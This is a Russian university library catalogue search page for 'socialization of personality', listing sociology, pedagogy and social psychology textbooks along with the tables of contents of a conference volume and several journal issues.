Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

275 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СОЦИАЛИЗАЦИЯ ЛИЧНОСТИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 21
1. 
Бордовская, Нина Валентиновна. Педагогика : учебное пособие для студентов вузов / Н. В. Бордовская, А. А. Реан, 2008. - 304 с.

Учебное пособие представляет собой компактный и высокоинформативный очерк истории, теории и практики педагогики, написанный ведущими петербургскими специалистами по педагогике и педагогической психологии. Читатель узнает об основных этапах становления и новейших достижениях педагогики, о структуре мирового образовательного пространства, о разнообразии форм и направлений современной педагогической деятельности. Значительное место в данном пособии отведено анализу трудных педагогических ситуаций. Этот раздел поможет будущему профессионалу научиться активно использовать их воспитательный и обучающий потенциал, применять на практике современные психологические знания.

2. 
Сластенин В. А. Психология и педагогика [Текст] : учеб. пособие для студентов высш. учеб. заведений / В. А. Сластенин, В. П. Каширин, 2006. - 478 с.
Ключевые слова 
ПСИХОЛОГИЯ - ИСТОРИЯ -- ПСИХОЛОГИЯ - ПЕДАГОГИКА -- ПЕДАГОГИКА - ПСИХОЛОГИЯ -- ПСИХИКА ЧЕЛОВЕКА -- МОЗГ ЧЕЛОВЕКА -- ПСИХОЛОГИЯ ЛИЧНОСТИ -- ИССЛЕДОВАНИЕ ПЕДАГОГИЧЕСКОЕ -- ВОСПИТАНИЕ ЛИЧНОСТИ -- САМОВОСПИТАНИЕ -- СОЦИАЛИЗАЦИЯ ЛИЧНОСТИ -- ПРОЦЕСС ПЕДАГОГИЧЕСКИЙ -- воспитание гуманистическое -- ВОСПИТАНИЕ ГРАЖДАНСКОЕ -- КУЛЬТУРА НРАВСТВЕННАЯ -- ВОСПИТАНИЕ ТРУДОВОЕ -- КУЛЬТУРА ЭСТЕТИЧЕСКАЯ -- КУЛЬТУРА ФИЗИЧЕСКАЯ -- КОЛЛЕКТИВ ПЕДАГОГИЧЕСКИЙ -- ПРОЦЕСС УЧЕБНЫЙ -- ОБУЧЕНИЕ - ПЕДАГОГИКА -- ПСИХОЛОГИЯ ПРОФЕССИОНАЛЬНАЯ -- ПСИХОЛОГИЯ ПЕДАГОГА -- СПЕЦИАЛИСТ - психология -- личность специалиста -- ПСИХОЛОГИЯ КОНФЛИКТА -- АДАПТАЦИЯ специалиста -- СТРЕСС
3. 
Волков Ю. Г. Социология [Текст] : учеб. для вузов / Ю. Г. Волков ; под общ. ред. В. И. Добренькова, 2007. - 572 с.
Ключевые слова 
СОЦИОЛОГИЯ - ИСТОРИЯ -- КОНФЛИКТОЛОГИЯ СОЦИАЛЬНАЯ -- ОБЩЕСТВО -- КУЛЬТУРА -- СОЦИОЛОГИЯ ЛИЧНОСТИ -- СОЦИАЛИЗАЦИЯ ЛИЧНОСТИ -- ИНСТИТУТ СОЦИАЛЬНЫЙ -- ГРУППА СОЦИАЛЬНАЯ -- структура социальная -- ДЕМОГРАФИЯ -- КОНФЛИКТ -- ЧИСЛЕННОСТЬ НАСЕЛЕНИЯ -- ОРГАНИЗАЦИЯ СОЦИАЛЬНАЯ -- СТРАТИФИКАЦИЯ СОЦИАЛЬНАЯ -- СОЗНАНИЕ массовое -- СОЦИОЛОГИЯ СЕМЬИ -- СОЦИОЛОГИЯ РЕЛИГИИ -- СОЦИОЛОГИЯ ПОЛИТИКИ -- ПОВЕДЕНИЕ ДЕВИАНТНОЕ -- СОЦИОЛОГИЯ УПРАВЛЕНИЯ -- Социология безопасности -- ЭТНОСОЦИОЛОГИЯ -- СОЦИОЛОГИЯ МОЛОДЕЖИ -- ДВИЖЕНИЕ СОЦИАЛЬНОЕ -- ГЛОБАЛИЗАЦИЯ - СОЦИОЛОГИЯ -- ИДЕОЛОГИЯ
Держатели документа (Информация об экземплярах) 
4. 
Борев, Владимир Юрьевич. Культура и массовая коммуникация [Текст] / В. Ю. Борев, А. В. Коваленко ; отв. ред. А. И. Арнольдов, 1986. - 301, [2] с.
Держатели документа (Информация об экземплярах) 
5. 
Иванова, Наталия Витальевна. Социальное развитие детей в ДОУ : методическое пособие / Н. В. Иванова, Е. Ю. Бардинова, А. М. Калинина, 2008. - 128 с.
6. 
Развитие личности в образовательном пространстве : труды 10-й Всероссийской научно-практической конференции (Бийск, 30 марта 2012) : в 2-х ч.Ч. 1 / отв. ред. В. П. Никишаева ; ред.: А. Ю. Арутюнян, Е. Б. Манузина, Е. Э. Норина, 2012. - 271 с.
Оглавление 
  • Арутюнян, Анна Юрьевна. Образовательное пространство в контексте адекватной социализации личности / А. Ю. Арутюнян, О. И. Гербет. - с.10
  • Голованова, Е. Г. Значимость прецедентных феноменов в обучении иноязычному межкультурному общению / Е. Г. Голованова. - с.16
  • Гусева, Н. Г. Учитель как личность и как профессионал / Н. Г. Гусева. - с.18
  • Гусев, Юрий Александрович. Динамика показателей жизненной емкости легких у студентов в процессе обучения / Ю. А. Гусев. - с.22
  • Довыдова, Марина Викторовна. Профессиональное самоопределение будущих педагогов / М. В. Довыдова. - с.25
  • Дзагоева, Екатерина Адамовна. Апробация и внедрение - необходимые составляющие проектной деятельности / Е. А. Дзагоева. - с.30
  • Захарова, Татьяна Владимировна. Научно-исследовательская работа студентов как форма квазипрофессиональной деятельности / Т. В. Захарова. - с.33
  • Исаева, Марина Борисовна. Модель культурологической подготовки профессионального становления будущего учителя / М. Б. Исаева. - с.36
  • Космин, Владимир Степанович. Совершенствование обучения по дисциплинам образовательной области "Технология" в АГАО им. В. М. Шукшина / В. С. Космин, В. В. Харченко. - с.39
  • Манаева, Г. А. Подходы к изучению процесса социально-психологической адаптации личности / Г. А. Манаева. - с.41
  • Мамедова, С. А. Адаптация выпускников в условиях рынка труда / С. А. Мамедова. - с.47
  • Мельникова, Е. А. Дети, вовлеченные в эпидемию ВИЧ/СПИДа, как объект профессиональной деятельности будущих педагогов / Е. А. Мельникова. - с.51
  • Наджафова, Рамила Вагифовна. Трактовка термина "коммуникативные умения" в исследованиях современных ученых / ; Р. В. Наджафарова. - с.57
  • Протасов, Виктор Васильевич. Соотношение процессов развития личности и формирования компетенций / В. В. Протасов, И. Н. Протасова. - с.60
  • Савельева, Надежда Паисьевна. К проблеме жизнеустойчивости в образовательном пространстве / Н. П. Савельева. - с.67
  • Трофимчук, Александр Григорьевич. Идеальный портрет выпускника вуза в системе воспитания на основе общечеловеческих ценностей / А. Г. Трофимчук. - с.69
  • Шабалин, Р. А. Влияние развития настольного тенниса на физическое воспитание студентов / Р. А. Шабалин, Е. П. Шабалина. - с.72
  • Шабалина, Елена Петровна. Нравственно-эстетическое отношение студентов к своей будущей профессиональной деятельности / Е. П. Шабалина, А. Г. Суслова. - с.75
  • Шефер, О. В. Педагогические аспекты формирования профессиональной компетентности будущего педагога / О. В. Шефер, Е. П. Шабалина. - с.82
  • Худякова, Т. А. Формирование навыков межкультурной компетенции в процессе обучения английскому языку как условие развития личности студента / Т. А. Худякова. - с.85
  • Ярмакеев, И. Э. Народная педагогика как средство формирования поликультурной личности будущего педагога / И. Э. Ярмакеев. - с.89
  • Алексеева, Татьяна Васильевна. Профилактика негативного влияния молодежной субкультуры на личность подростков / Т. В. Алексеева. - с.95
  • Байгулова, Н. В. Особенности воспитательного воздействия сельской социокультурной среды на жизнеспособность и конкурентоспособность учащихся / Н. В. Байгулова. - с.98
  • Галицкая, Л. В. Роль социального проектирования в становлении личности учащихся / Л. В. Галицкая. - с.101
  • Доровик, Ю. С. Формирование пространственных представлений младших школьников через внеурочную деятельность / Ю. С. Доровик. - с.104
  • Доровских, А. Г. Проектная работа как инновационный подход к организации воспитательной деятельности в начальных классах / А. Г. Доровских. - с.106
  • Задворная, Т. В. Внешние факторы, способствующие актуализации творческого потенциала личности / Т. В. Задворная, Е. П. Шабалина. - с.110
  • Кобызева, Галина Юрьевна. Организация педагогического взаимодействия учителя и учащихся начальных классов как вариант организации социального контакта / Г. Ю. Кобызева. - с.113
  • Краморева, Т. В. Реализация программы формирования здорового образа жизни подростков - условие успешной социализации личности / Т. В. Краморева, Е. Э. Норина. - с.117
  • Кучина, Е. Г. Роль истории и краеведения в решении проблем гражданско-патриотического воспитания подрастающего поколения / Е. Г. Кучина : 120
  • Корниенко, Е. В. Шефство - это форма межличностного и межгруппового взаимодействия учащихся разных возрастов / Е. В. Корниенко, Н. В. Ипатова. - с.124
  • Коробова, В. Ф. Развитие личности в образовательном пространстве. Современная воспитывающая среда / В. Ф. Коробова. - с.127
  • Кошелева, Т. С. Эстетическое воспитание детей средствами окружающей среды / Т. С. Кошелева. - с.131
  • Кузнецова, Любовь Николаевна. Педагогические условия личностного самоопределения подростков / Л. Н. Кузнецова. - с.133
  • Манузина, Елена Борисовна. Тенденции развития и социально-педагогические условия гражданского воспитания в современных общеобразовательных учреждениях / Е. Б. Манузина. - с.136
  • Москвичева, Т. Ю. Методические рекомендации классному руководителю в работе с родителями учащихся для создания благоприятной воспитательной среды / Т. Ю. Москвичева. - с.140
  • Пушкова, Н. Б. Приращение коммуникативной компетентности учащихся старшего подросткового возраста в процессе урочной и внеурочной деятельности / Н. Б. Пушкова. - с.147
  • Сарачкова, И. М. Приращение коммуникативной компетентности учащихся старшего подросткового возраста в процессе урочной и внеурочной деятельности / И. М. Сарачкова. - с.147
  • Селиверстова, Н. И. Работа педагогического коллектива и родительской общественности по программе "Здоровье" в МОУ Карабинская СОШ / Н. И. Селиверстова. - с.152
  • Сонин, С. В. Детский туризм как одно из условий личностного развития школьников / С. В. Сонин, Е. Э. Норина. - с.156
  • Старовикова, Т. А. Проект "Край родной, навек любимый, где найдешь еще такой..." - воспитательная система класса / Т. А. Старовикова. - с.159
  • Ткаченко, О. В. Воспитание гражданственности у школьников в рамках гражданско-правового образования / О. В. Ткаченко. - с.161
  • Федотова, С. П. Социальное проектирование - способ развития гражданского общества / С. П. Федотова. - с.164
  • Чикурова, О. С. Музыкальное духовно-нравственное воспитание школьника / О. С. Чикурова. - с.168
  • Шабалина, Елена Петровна. Организация школьного ученического самоуправления в МБОУ "Барагашская СОШ" / Е. П. Шабалина, Ч. В. Басаргина. - с.170
  • Антропова, О. Г. Использование технологии РКМЧП на уроках иностранного языка с целью формирования коммуникативных компетенций учащихся / О. Г. Антропова. - с.175
  • Атаева, Л. В. Здоровьесберегающие образовательных технологии / Л. В. Атаева. - с.178
  • Афанасьева, Е. Г. Личностно-ориентированное обучение на уроках русского языка и литературы как средство формирования языковой компетенции личности школьника / Е. Г. Афанасьева. - с.181
  • Береснева, Т. В. Здоровьесберегающие технологии на занятиях иностранного языка в специальных (коррекционных) классах VII вида / Т. В. Береснева. - с.185
  • Гахова, Н. И. Использование информационно-компьютерных технологий на уроках изобразительного искусства / Н. И. Гахова. - с.190
  • Данилова, Н. Н. Дебаты как форма обсуждения проблемы на уроках литературы / Н. Н. Данилова. - с.193
  • Каковина, М. Д. Причины неуспеваемости школьников и пути ее преодоления и предупреждения / М. Д. Каковина, Е. Б. Манузина. - с.198
  • Лисова, С. А. Применение технологии модерации на уроках информатики / С. А. Лисова. - с.200
  • Левгерова, Е. В. Внедрение интерактивных технологий в практическое обучение студентов колледжа в контексте перехода к новым ФГОС СПО / Е. В. Левгерова, Э. Р. Пташинская. - с.204
  • Маринина, М. В. Формирование ключевых компетенций учащихся средствами технологии развития критического мышления через чтение и письмо / М. В. Маринина. - с.208
  • Норина, Елена Эдуардовна. Использование технологии развития критического мышления через чтение и письмо в формировании ключевых компетенций бакалавров педагогического образования / Е. Э. Норина. - с.210
  • Ожогина, Т. Н. Здоровьесберегающие подходы в обучении леворуких детей в период адаптации к школе / Т. Н. Ожогина. - с.214
  • Плотникова, Г. М. Развитие творческих способностей учащихся как одно из условий здоровьесберегающих технологий / Г. М. Плотникова. - с.217
  • Очаковская, С. В. Использование игровых технологий как способ повышения мотивации учащихся / С. В. Очаковская. - с.219
  • Окунева, Л. А. Роль ИКТ в формировании информационной компетентности учащихся на занятиях предпрофильного курса "Основы имиджелогии и делового общения" / Л. А. Окунева. - с.222
  • Падюков, Андрей Константинович. Развитие творческих способностей учащихся через проектно-исследовательскую деятельность с использованием ИКТ / А. К. Падюков, Т. В. Падюкова. - с.226
  • Поварова, Т. В. Формирование ключевых компетенций на уроках естественно научного цикла по средствам кейс-технологии / Т. В. Поварова. - с.230
  • Путненева, О. Н. Формирование ИКТ-компетенции младшего школьника через участие в сетевых проектах / О. Н. Путненева. - с.232
  • Ривкинд, Т. Д. Актуализация мотивов учебной деятельности учащихся НПО средствами технологии модерации как одно из условий повышения качества образовательного процесса / Т. Д. Ривкинд. - с.236
  • Руколеев, А. С. Использование блочно-модульной технологии на уроках истории / А. С. Руколеев, Н. К. Шишкова. - с.239
  • Саратовская, О. В. Использование модульной технологии на ступени СПО как средство формирования умений самостоятельной работы учащихся / О. В. Саратовская. - с.243
  • Снегирева, Т. А. Внедрение педагогических технологий на уроках географии через реализацию компетентностного подхода / Т. А. Снегирева. - с.249
  • Семенова, В. В. Технология дебатов как инструмент повышения коммуникативной культуры старших школьников / В. В. Семенова. - с.251
  • Тимошкина, Т. Я. Технология проблемного обучения как способ активизации речемыслительной деятельности учащихся на уроках английского языка / Т. Я. Тимошкина. - с.254
  • Хабарова, Н. В. Социальное проектирование на уроках географии / Н. В. Хабарова. - с.257
  • Цепенко, С. Н. Использование здоровьесберегающих технологий на уроках английского языка / С. Н. Цепенко. - с.216
  • Щетинина, И. Н. Педагогические технологии в образовательном процессе как одно из условий повышения качества образования / И. Н. Щетинина. - с.265
  • Юрина, С. Ю. Технология сотрудничества в образовательном процессе / С. Ю. Юрина. - с.268
7. 
Государство и право. - Журнал, 2015г. № 6
Оглавление 
  • Гриценко, Е. В. Формирование доктрины прямого действия Конституции в российском конституционном праве / Е. В. Гриценко. - с.5-18
    Кл. слова: КОНТРОЛЬ КОНСТИТУЦИОННЫЙ, СУД КОНСТИТУЦИОННЫЙ, КОНСТИТУЦИЯ РФ
  • Павликов, С. Г. О "революционных" изменениях государства и права в новейшей истории и феномене "цветных революций" / С. Г. Павликов. - с.19-26
    Кл. слова: РЕВОЛЮЦИЯ ЦВЕТНАЯ, ПЕРЕВОРОТ, ПУТЧ
  • Бельский, К. С. Заблуждение как научный факт в науке финансового права / К. С. Бельский. - с.27-35
    Кл. слова: ЗАБЛУЖДЕНИЕ ИСКРЕННЕЕ, ЗАБЛУЖДЕНИЕ ПРЕДНАМЕРЕННОЕ, ПРАВО ФИНАНСОВОЕ
  • Добрынин, Н. М. Государственный суверенитет в контексте последних тенденций глобализации6 право или привилегия / Н. М. Добрынин. - с.36-42
    Кл. слова: СУВЕРЕНИТЕТ НАЦИОНАЛЬНО-ГОСУДАРСТВЕННЫЙ, ИНТЕРЕСЫ ГОСУДАРСТВЕННЫЕ, ПРАВО МЕЖДУНАРОДНОЕ
  • Дубынина, Т. В. Институциональное позиционирование военных организаций как субъектов гражданско-правовых отношений во внутригосударственном правопорядке Российской Федерации / Т. В. Дубынина. - с.43-54
    Кл. слова: ОРГАНИЗАЦИЯ ВОЕННАЯ, ПРЕДПРИЯТИЕ ОБОРОННОЕ, РФ
  • Нечаева, А. М. Дееспособность несовершеннолетних по Гражданскому кодексу Российской Федерации / А. М. Нечаева. - с.55-61
    Кл. слова: НЕСОВЕРШЕННОЛЕТНИЕ - ДЕЕСПОСОБНОСТЬ, ИМУЩЕСТВО НЕСОВЕРШЕННОЛЕТНЕГО, СДЕЛКИ БЫТОВЫЕ
  • Каламкарян, Р. А. Международная нормативная система как институционно-правовая составляющая современного миропорядка / Р. А. Каламкарян, Ю. И. Мигачев. - с.62-70
    Кл. слова: ПРАВО МЕЖДУНАРОДНОЕ, СУД МЕЖДУНАРОДНЫЙ, НОРМЫ МЕЖДУНАРОДНОГО ПРАВА
  • Осипов, М. Ю. Теория правовых процессов и ее место в системе юридической науки / М. Ю. Осипов. - с.71-75
    Кл. слова: ТЕОРИЯ ПРАВА
  • Орлова, О. В. Личность - основная ценность гражданского общества / О. В. Орлова. - с.76-81
    Кл. слова: ЛИЧНОСТЬ - ПРАВО, ОБЩЕСТВО ГРАЖДАНСКОЕ, СОЦИАЛИЗАЦИЯ ЛИЧНОСТИ
  • Аубакирова, И. У. Государственно-управленческая модель "либерального этатизма" в социальных средах нелиберального типа / И. У. Аубакирова. - с.82-87
    Кл. слова: МОДЕЛЬ УПРАВЛЕНЧЕСКАЯ, ЭТАТИЗМ ЛИБЕРАЛЬНЫЙ
  • Дорская, А. А. Потенциал историко-правовой науки в осмыслении теоретико-правовых категорий (на примере понятия "система права") / А. А. Дорская. - с.88-92
    Кл. слова: СИСТЕМА ПРАВА, ПРАВО ПУБЛИЧНОЕ, ПРАВО ЧАСТНОЕ
  • Корсаков, К. В. Принцип равновозмездности в феномене уголовного наказания / К. В. Корсаков. - с.93-97
    Кл. слова: НАКАЗАНИЕ УГОЛОВНОЕ, МЕСТЬ КРОВНАЯ, ТАЛИОН
  • Калинина, О. М. Освобождение от уголовной ответственности в связи с примирением с потерпевшим: современные реалии / О. М. Калинина. - с.98-101
    Кл. слова: ОСВОБОЖДЕНИЕ ОТ УГОЛОВНОЙ ОТВЕТСТВЕННОСТИ, ПРИМИРЕНИЕ С ПОТЕРПЕВШИМ, ПРИЗНАНИЕ ВИНЫ
  • Киселев, В. С. К вопросу о классификации конституционных принципов организации и функционирования судебной власти / В. С. Киселев. - с.102-104
    Кл. слова: ВЛАСТЬ СУДЕБНАЯ - ПРИНЦИПЫ, СИСТЕМА СУДЕБНАЯ, СУДОУСТРОЙСТВО - РОССИЯ
  • Матренина, К. Ю. Реализация конституционных прав граждан посредством использования средств электронного голосования / К. Ю. Матренина. - с.105-108
    Кл. слова: ГОЛОСОВАНИЕ ЭЛЕКТРОННОЕ, ПРАВО ИЗБИРАТЕЛЬНОЕ, ИНТЕРНЕТ
8. 
Социально-гуманитарные знания. - Журнал, 2012г. № 6 (нояб.-дек.)
Оглавление 
  • Дашевич, В. И. Какая модель общественного развития нужна России / ; В. И. Дашевич. - с.3-21., реформы в странах социализма, перестройка
  • Ирхин, Ю. В. Ценность и смысл основных форм и модификаций либеральной идеологии / ; Ю. В. Ирхин. - с.22-36.
    Кл. слова: ценности, смыслы, модификации либерализма
  • Васильева, Л. Н. Социальная рента как явление современного мира / ; Л. Н. Васильева. - с.49-68.
    Кл. слова: социальная рента , капитализм, идеология
  • Рудакова, Е. Н. Влияние глобализации на государственную политику России в сфере образования / ; Е. Н. Рудакова. - с.69-83.
    Кл. слова: глобализация, глобальное образование, образовательная политика
  • Нестерова, А. Ю. Теоретические аспекты проблемы профессионального самоопределения личности / ; А. Ю. Нестерова. - с.84-90
    Кл. слова: профессиональное самоопределение, личность, профессия
  • Кочетов, В. В. Этика конституциализма: к вопросу о моральном измерении современной политики / ; В. В. Кочетов. - с.91-104.
    Кл. слова: конституциализм, этика, права человека
  • Гречишникова, Н. П. Воспитание предпринимателей как новое направление в отечественной педагогике / ; Н. П. Гречишникова, С. Е. Гречишников. - с.105-114.
    Кл. слова: рефлексия, воспитание предпринимателей, вызов современной эпохи
  • Гончар, С. Н. Содержание и сущность жизненно важных проблем современной молодежи / ; С. Н. Гончар. - с.115-121.
    Кл. слова: жизненно важные проблемы, классификация проблем, молодежь
  • Титов, П. Б. Физическая культура и ее влияние на развитие личности / ; П. Б. Титов. - с.122-127.
    Кл. слова: спорт, физическая культура, философско-антропологичиские основания
  • Макин, И. О. Выбор как объективная реальность экономической жизни страны / ; И. О. Макин. - с.128-136.
    Кл. слова: теория рационального выбора, рациональные модели, принимаемые решения
  • Белов, Е. А. Особенности определения теневой занятости населения в рамках различных предметных подходов / ; Е. А. Белов. - с.137-149.
    Кл. слова: теневая занятость, неформальная занятость, криминальная занятость
  • Тюрин, В. И. К вопросу о фактах, обусловивших необходимость активизации деятельности органов госбезопасности в период Московской битвы / ; В. И. Тюрин. - с.150-165.
    Кл. слова: органы госбезопасности, военная разведка, контрразведка
  • Чесноков, Г. Д. А.И. Герцен: мысли о России / ; Г. Д. Чесноков. - с.166-184.
    Кл. слова: Россия и Запад, славянофилы и западники, царское самодержавие
  • Черткова, Н. Е. Музыка темных аллей (философия любви Души русской) / ; Н. Е. Черткова. - с.185-194.
    Кл. слова: творчество, искусство, философия
  • Костюкова, Е. В. Эволюция позитивистских воззрений В.В. Лесевича / ; Е. В. Костюкова. - с.195-204.
    Кл. слова: философия, позитивизм, эмпириокритицизм
  • Каширин, В. И. Ноосферный патриотизм как концепт культуры времени / ; В. И. Каширин. - с.205-219
    Кл. слова: ноосферный патриотизм, глобальное доверие, культура ноосферного самосознания
  • Бугаенко, Ю. Ю. Правовой нигилизм как социокультурный феномен в современном российском обществе / ; Ю. Ю. Бугаенко. - с.220-229.
    Кл. слова: российское общество, нигилизм, современное общество
  • Суслов, Е. В. Парламентаризация политической системы как тренд в европейской политике (на примере Финляндии) / ; Е. В. Суслов. - с.230-240.
    Кл. слова: парламентаризм, парламент (Эдускунта), конституционализация
  • Данакин, Н. С. Концептуальный анализ феномена соревновательности / ; Н. С. Данакин, С. В. Хашаева. - с.241-249.
    Кл. слова: соревновательность, соревновательные отношения, самоутверждение
  • Майкова, В. П. Целостно-синкретическая стратегия освоения мира / ; В. П. Майкова. - с.250-258.
    Кл. слова: целостное сознание, гармония, фактрально-голографическое мышление
  • Назаров, М. М. Коммуникационное пространство как среда "общества спектакля" / ; М. М. Назаров. - с.259-275.
    Кл. слова: общество спектакля, средства массовой коммуникации, общество потребления
  • Торенко, А. Н. О совершенствовании механизма регулирования миграционных процессов в Приморском крае / ; А. Н. Торенко. - с.276-286.
    Кл. слова: миграция, иммиграция, миграционная политика
  • Трещалин, М. Ю. Энергетика и "эффект формы" пирамид / ; М. Ю. Трещалин. - с.287-294.
    Кл. слова: пирамида, эффект формы, энергетические потоки
  • Леонова, О. Г. У России есть национальная идея!? / ; О. Г. Леонова. - с.295-310.
    Кл. слова: национальная идея, особенности, типы
  • Дождиков, А. В. Фальсификация истории и оправдание экстремистской деятельности: проблемы взаимосвязи / ; А. В. Дождиков. - с.311-324.
    Кл. слова: фальсификация истории России, экстремизм, профессиональные сообщества
  • Кравец, Э. В. Политика США в Центральной Азии в XXI веке / ; Э. В. Кравец. - с.325-331.
    Кл. слова: политика США в Центральной Азии, сферы интересов, военные базы
  • Галеев, В. Р. Социальное партнерство как фактор интеграции институтов гражданского общества в правоохранительной сфере / ; В. Р. Галеев. - с.332-337.
    Кл. слова: социальное партнерство, борьба с преступностью, органы внутренних дел
  • Пажитнева, К. Е. Семейные ценности - гарант нравственного здоровья общества / ; К. Е. Пажитнева. - с.338-342.
    Кл. слова: ценности, семейные ценности, социализация личности
  • Осин, А. А. Модель роевого интеллекта в организационных коммуникациях / ; А. А. Осин. - с.343-349.
    Кл. слова: организационные коммуникации, информация, роевой интеллект
  • Котухов, А. Н. Ценностные основания образовательной деятельности в вузах пограничного профиля: понятия и структура / ; А. Н. Котухов. - с.350-357.
    Кл. слова: вузы пограничного профиля, ценность, ценностные основания
  • Козлова, А. С. Методологические подходы к проблеме воспитания экологической культуры индивида / ; А. С. Козлова. - с.358-326.
    Кл. слова: экологическая культура, экологическое воспитание, экологическое образование
  • Селек, И. Развитие образования в Турции: концептуальные вопросы / И. Селек. - с.363-365.
    Кл. слова: образование, качество обучения, воспитание молодежи
  • Селек, И. Развитие образования в Турции: концептуальные вопросы / И. Селек. - с.363-365
    Кл. слова: ЗАРУБЕЖНЫЕ--СТРАНЫ
9. 
Отечественный журнал социальной работы. - Журнал, 2004г. № 2
Оглавление 
  • Кононова, Л. И. Социальные и психолого-педагогические условия развития творческого потенциала человека в "ситуации социальной работы" / Л. И. Кононова. - с.4-7
    Кл. слова: Творческий потенциал
  • Антоневич, С. П. Институт сервиса как инструмент реализации социальной политики / С. П. Антоневич. - с.8-12 : табл.
    Кл. слова: Социальный институт
  • Гусарова, М. Е. Технологии политики занятости / М. Е. Гусарова, Е. Е. Горина. - с.12-15
    Кл. слова: Безработица, Поиск работы
  • Сизова, В. В. Роль семьи в воспитании личности в условиях информатизации общества в России / В. В. Сизова. - с.15-17
    Кл. слова: Социализация личности
  • Никулина, О. М. Демографические характеристики молодежи / О. М. Никулина. - с.17-19 : табл.
    Кл. слова: Гендерные различия
  • Хаярова, Л. Р. Социально-психологические методы первичной профилактики наркомании в студенческой среде / Л. Р. Хаярова. - с.19-24 : ил.
    Кл. слова: Адаптация социально-психологическая, Студент
  • Куприна, В. А. Особенности функционирования общественных благотворительных организаций в условиях современного правового пространства / В. А. Куприна. - с.31-37 : табл.
  • Чеджемов, С. Р. Правительственная политика и благотворительно-педагогическая деятельность осетинской интеллигенции / С. Р. Чеджемов. - с.37-42
  • Куликов, С. В. Обеспечение активной старости как этический принцип профессиональной деятельности специалистов по социальной работе / С. В. Куликов. - с.47-50
    Кл. слова: Пожилые люди, Возрастные особенности
  • Заплетина, Н. И. Социальный работник и пожилой клиент: проблемное поле конфликтов / Н. И. Заплетина, М. В. Воронцова. - с.43-47
    Кл. слова: Пожилые люди, Стратегия взаимодействия
  • Астоянц, М. С. Социокультурная обусловленность личностных характеристик несовершеннолетнего в условиях депривации / М. С. Астоянц. - с.50-52
    Кл. слова: Сиротство социальное
  • Шиморина, Е. Ф. Взаимосвязь фундаментального и профессионального знания в структуре образовательного знания / Е. Ф. Шиморина. - с.53-55
    Кл. слова: Гуманизация знания
  • Васильчиков, В. М. Клиенты и кадры надомной социальной службы / В. М. Васильчиков, З. Н. Авдошкина. - с.55-58
    Кл. слова: Пожилые люди, Обслуживание на дому
  • Котова, З. Ф. Взаимодействие учреждений социальной защиты населения, здравоохранения и общественных объединений в решении проблем пожилых людей (на примере Центра социального обслуживания "Южнопортовый") / З. Ф. Котова. - с.58-60
  • Курушин, В. В. Проблемы социальной адаптации бездомных граждан и пути их решения в условиях мегаполиса / В. В. Курушин. - с.61-64 : табл.
    Кл. слова: Бродяжничество
  • Топчий, Л. В. Правовое, организационное и научно-методическое закрепление профессии "социальная работа" в изменяющейся России / Л. В. Топчий. - с.65-72
    Кл. слова: Подготовка кадров, Институционализация
  • Гарашкина, Н. В. Перспективы проектирования подготовки специалистов социальной работы с позиции компетентностного подхода / Н. В. Гарашкина. - с.72-78 : табл.
    Кл. слова: Профессиональное умение
Держатели документа (Информация об экземплярах) 
10. 
Социология [Текст] : учеб. для вузов / под ред. В. Н. Лавриненко, 2006. - 447 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- СОЦИОЛОГИЧЕСКОЕ ЗНАНИЕ -- ЗАПАДНАЯ -- МАРКСИЗМ -- МАРКСИСТСКАЯ -- СОЦИОЛОГИЯ -- ОБЩЕСТВО -- СОЦИОЛОГИЧЕСКАЯ МЫСЛЬ -- ЭТНИЧЕСКАЯ -- ПОЛИТИЧЕСКАЯ -- СОЦИОЛОГИЯ КУЛЬТУРЫ -- СОЦИАЛЬНЫЙ ИНСТИТУТ -- СЕМЬЯ -- БРАК -- ЛИЧНОСТИ -- ОБЩЕСТВЕННОЕ МНЕНИЕ -- СВОБОДНОЕ ВРЕМЯ -- РЫНОК -- КОНФЛИКТ -- ГЛОБАЛИЗАЦИЯ -- СОЦИОЛОГИЧЕСКОЕ ИССЛЕДОВАНИЕ -- ПРИКЛАДНАЯ -- СОЗНАНИЕ ПОЛИТИЧЕСКОЕ -- СОЦИОЛОГИЯ КУЛЬТУРЫ -- КУЛЬТУРА - СОЦИОЛОГИЯ -- КУЛЬТУРА МАССОВАЯ -- СУБКУЛЬТУРА -- ИНСТИТУТ СОЦИАЛЬНЫЙ -- ОРГАНИЗАЦИЯ СОЦИАЛЬНАЯ -- СОЦИОЛОГИЯ СЕМЬИ -- СЕМЬЯ - СОЦИОЛОГИЯ -- БРАК - социология -- СОЦИОЛОГИЯ ЛИЧНОСТИ -- СОЦИАЛИЗАЦИЯ ЛИЧНОСТИ -- МНЕНИЕ ОБЩЕСТВЕННОЕ -- ВРЕМЯ СВОБОДНОЕ - Социология -- Социология рынка -- КОНФЛИКТ СОЦИАЛЬНЫЙ -- ГЛОБАЛИЗАЦИЯ - СОЦИОЛОГИЯ -- ИССЛЕДОВАНИЕ СОЦИОЛОГИЧЕСКОЕ -- ОПРОС - СОЦИОЛОГИЯ -- АНКЕТА СОЦИОЛОГИЧЕСКАЯ -- ИНТЕРВЬЮ - социология -- НАБЛЮДЕНИЕ - СОЦИОЛОГИЯ -- ЭКСПЕРИМЕНТ - СОЦИОЛОГИЯ -- АНАЛИЗ ДОКУМЕНТОВ

Новое издание известного учебника "Социология" подготовлено с учетом апробации двух предыдущих изданий. Основная цель учебника - помочь изучающим курс социологии научно осмыслить сложные явления и процессы современной общественной жизни, чтобы сознательно ориентироваться в них, а также разобраться в существующих социологических теориях.

Содержание и структура учебника дают представление о существующих уровнях социологического знания, которые отражают соответствующие уровни анализа социальных явлений.

Для студентов вузов, учащихся колледжей, лицеев и школ, для всех, интересующихся проблемами развития и жизни общества.

11. 
Социальная психология [Текст] : Учеб. пособие для вузов / Новосиб. гос. ун-т, 2001. - 407 с.
Держатели документа (Информация об экземплярах) 

В учебном пособии, подготовленном в соответствии с программой курса "Социальная психология" для вузов, раскрываются фундаментальные основы этой дисциплины: ее методология, социально-психологическая ситуация, социальное мышление, социальное общение, межличностные отношения, психология индивида как субъекта социума, а также психология малых и больших, организованных и стихийных социальных групп. В пособии представлен и методический аппарат - ключевые понятия темы, вопросы для самоанализа, психологический практикум.

Для студентов и аспирантов, слушателей институтов повышения квалификации и переподготовки преподавательских кадров по специальности "Психология".

